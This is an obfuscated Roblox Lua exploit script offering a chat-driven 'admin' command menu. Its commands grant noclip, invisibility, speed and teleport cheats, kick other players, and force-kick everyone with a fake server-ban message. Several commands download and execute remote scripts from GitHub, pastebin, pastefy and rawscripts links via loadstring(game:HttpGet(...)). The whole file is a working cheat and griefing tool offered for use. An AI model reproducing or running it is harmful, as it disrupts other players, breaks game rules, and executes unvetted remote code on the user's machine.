--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=game:GetService("Players");local v1=v0.LocalPlayer;local v2=game:GetService("UserInputService");local v3=game:GetService("RunService");local v4=game:GetService("StarterGui");local v5=game:GetService("TweenService");v4:SetCore("SendNotification",{Title="ADMIN SYSTEM",Text="ADMIN ON",Icon="rbxassetid://7733960981",Duration=1 + 4 });local v6={};local v7={";noclip",";unnoclip",";kick",";tp player",";invisible",";uninvisible",";jerk",";tp tools",";kill",";gh",";orbit",";unorbit",";console",";cmds",";speed",";audio rp",";anim zombie",";seraphic blade",";anim 096",";cmds anim",";bring parts",";1x1x1x1",";shutdown",";fly"};local v8={";anim zombie",";seraphic blade",";anim 096"};local v9=false;v3.Stepped:Connect(function() if v9 then for v27,v28 in pairs(v1.Character:GetDescendants()) do if (v28:IsA("BasePart") and (v28.CanCollide==true)) then v28.CanCollide=false;end end end end);local function v10(v12) for v24,v25 in pairs(v1.Character:GetDescendants()) do local v26=0;while true do if (v26==0) then if (v25:IsA("BasePart") and (v25.Name~="HumanoidRootPart")) then v25.Transparency=(v12 and 0.7) or (430 -(44 + 386)) ;end if v25:IsA("Decal") then v25.Transparency=(v12 and (1487 -(998 + 488))) or (0 + 0) ;end break;end end end end local function v11(v13,v14,v15) local v16=0 + 0 ;local v17;local v18;local v19;local v20;local v21;local v22;while true do if (v16==(772 -(201 + 571))) then v17=Instance.new("ScreenGui",v1:WaitForChild("PlayerGui"));v17.Name=v15;v17.ResetOnSpawn=false;v18=Instance.new("Frame",v17);v18.Size=UDim2.new(1138 -(116 + 1022) ,300,0 -0 ,206 + 144 );v18.Position=UDim2.new(0.5 -0 , -150,0.5 -0 , -175);v16=860 -(814 + 45) ;end if (v16==3) then v20.Font=Enum.Font.GothamBold;v20.TextSize=49 -29 ;v21=Instance.new("ScrollingFrame",v18);v21.Size=UDim2.new(1 + 0 ,0 + 0 ,1, -(935 -(261 + 624)));v21.Position=UDim2.new(0 -0 ,1080 -(1020 + 60) ,1423 -(630 + 793) ,135 -95 );v21.CanvasSize=UDim2.new(0 -0 ,0 + 0 ,0 -0 , #v13 * 30 );v16=1751 -(760 + 987) ;end if (v16==(1918 -(1789 + 124))) then v22.Position=UDim2.new(767 -(745 + 21) , -35,0 + 0 ,13 -8 );v22.TextColor3=Color3.new(3 -2 ,0 + 0 ,0 + 0 );v22.BackgroundTransparency=1;v22.Font=Enum.Font.GothamBold;v22.TextSize=16;v22.MouseButton1Click:Connect(function() v17:Destroy();end);break;end if (v16==(1059 -(87 + 968))) then v21.ScrollBarThickness=4;v21.BackgroundTransparency=4 -3 ;for v59,v60 in ipairs(v13) do local v61=Instance.new("TextLabel",v21);v61.Text=v60;v61.Size=UDim2.new(1, -(10 + 0),0 -0 ,1438 -(447 + 966) );v61.Position=UDim2.new(0,13 -8 ,0,(v59-(1818 -(1703 + 114))) * (731 -(376 + 325)) );v61.TextColor3=Color3.new(1 -0 ,2 -1 ,1);v61.Font=Enum.Font.Gotham;v61.TextSize=5 + 9 ;v61.BackgroundTransparency=2 -1 ;end v22=Instance.new("TextButton",v18);v22.Text="X";v22.Size=UDim2.new(14 -(9 + 5) ,406 -(85 + 291) ,1265 -(243 + 1022) ,114 -84 );v16=5 + 0 ;end if (v16==(1182 -(1123 + 57))) then v19.Thickness=2;v20=Instance.new("TextLabel",v18);v20.Text=v14;v20.Size=UDim2.new(1 + 0 ,254 -(163 + 91) ,0,40);v20.BackgroundTransparency=1931 -(1869 + 61) ;v20.TextColor3=Color3.new(1,1,1 + 0 );v16=10 -7 ;end if ((1 -0)==v16) then v18.BackgroundColor3=Color3.fromRGB(5 + 25 ,41 -11 ,29 + 1 );v18.BorderSizePixel=0;v18.Active=true;v18.Draggable=true;v19=Instance.new("UIStroke",v18);v19.Color=Color3.fromRGB(1729 -(1329 + 145) ,1056 -(140 + 831) ,1850 -(1409 + 441) );v16=720 -(15 + 703) ;end end end v1.Chatted:Connect(function(v23) v23=v23:lower();if (v23==";noclip") then v9=true;elseif (v23==";unnoclip") then v9=false;elseif v23:match("^;kick") then local v73=0 + 0 ;local v74;while true do if (v73==0) then v74=v23:split(" ")[440 -(262 + 176) ];for v78,v79 in ipairs(v0:GetPlayers()) do if (v79.Name:lower()==v74) then v79:Kick("You were kicked by ADMIN");end end break;end end elseif v23:match("^;tp player") then local v75=0;local v76;while true do if (v75==(1721 -(345 + 1376))) then v76=v23:split(" ")[3];for v81,v82 in ipairs(v0:GetPlayers()) do if (v82.Name:lower()==v76) then v1.Character:MoveTo(v82.Character.HumanoidRootPart.Position);end end break;end end elseif (v23==";invisible") then v10(true);elseif (v23==";uninvisible") then v10(false);elseif (v23==";jerk") then v4:SetCore("SendNotification",{Title="ADMIN",Text="Command ADMIN Will be added",Duration=691 -(198 + 490) });elseif (v23==";gh") then loadstring(game:HttpGet("https://raw.githubusercontent.com/GhostPlayer352/Test4/main/GhostHub"))();elseif v23:match("^;orbit") then local v83=0 -0 ;local v84;local v85;while true do if (v83==0) then v84=v23:split(" ")[4 -2 ];v85=nil;v83=1207 -(696 + 510) ;end if (v83==(1 -0)) then for v87,v88 in ipairs(v0:GetPlayers()) do if (v88.Name:lower()==v84) then v85=v88;end end if v85 then coroutine.wrap(function() while wait() do if ( not v85 or (v23==";unorbit")) then break;end v1.Character:MoveTo(v85.Character.HumanoidRootPart.Position + Vector3.new(5,1262 -(1091 + 171) ,0) );end end)();end break;end end elseif (v23==";console") then print("Console Opened");elseif (v23==";cmds") then v11(v7,"ADMIN CMDS","ADMIN_GUI");elseif v23:match("^;speed") then local v89=0 + 0 ;local v90;while true do if (v89==(0 -0)) then v90=tonumber(v23:split(" ")[2]);if v90 then v1.Character.Humanoid.WalkSpeed=v90;end break;end end elseif (v23==";tp tools") then local v91=0 -0 ;local v92;while true do if (v91==0) then v92=Instance.new("Tool");v92.RequiresHandle=false;v91=375 -(123 + 251) ;end if (v91==(9 -7)) then v92.Parent=v1.Backpack;break;end if (v91==(699 -(208 + 490))) then v92.Name="TP Tool";v92.Activated:Connect(function() local v98=0 + 0 ;local v99;while true do if ((0 + 0)==v98) then v99=v1:GetMouse();if v99 then v1.Character:MoveTo(v99.Hit.Position);end break;end end end);v91=838 -(660 + 176) ;end end elseif (v23==";kill") then v1.Character:BreakJoints();elseif (v23==";audio rp") then loadstring(game:HttpGet("https://raw.githubusercontent.com/nmalka01/nmalka01/refs/heads/main/Brookhaven_audio"))();elseif (v23==";anim zombie") then loadstring(game:HttpGet("https://pastefy.app/JOWniO6o/raw"))();elseif (v23==";seraphic blade") then loadstring(game:HttpGet("https://pastefy.app/59mJGQGe/raw"))();elseif (v23==";anim 096") then loadstring(game:HttpGet("https://pastefy.app/YsJgITXR/raw"))();elseif (v23==";cmds anim") then v11(v8,"CMDS ANIM","CMD_ANIM_GUI");elseif (v23==";bring parts") then loadstring(game:HttpGet("https://pastebin.com/raw/aZjaAr6F"))();elseif (v23==";1x1x1x1") then loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-1X1X1X1-GUI-MODDED-changed-the-names-and-messages-10246",true))();elseif (v23==";shutdown") then local v100=0 + 0 ;local v101;while true do if (v100==(204 -(14 + 188))) then v4:SetCore("SendNotification",{Title="CRASHED",Text="server CRASH!!1!1",Duration=681 -(534 + 141) });break;end if (v100==0) then for v103,v104 in pairs(v0:GetPlayers()) do v104:Kick("XPLOIT FORCE This server has been banned\nCode: 01119");end v101=Instance.new("Sound",workspace);v100=1 + 0 ;end if (v100==1) then v101.SoundId="rbxassetid://119731837417100";v101:Play();v100=2 + 0 ;end end elseif (v23==";fly") then loadstring(game:HttpGet("https://raw.githubusercontent.com/alifSTARZ/FLY/refs/heads/main/FLY-COMMaNDS"))();end end);
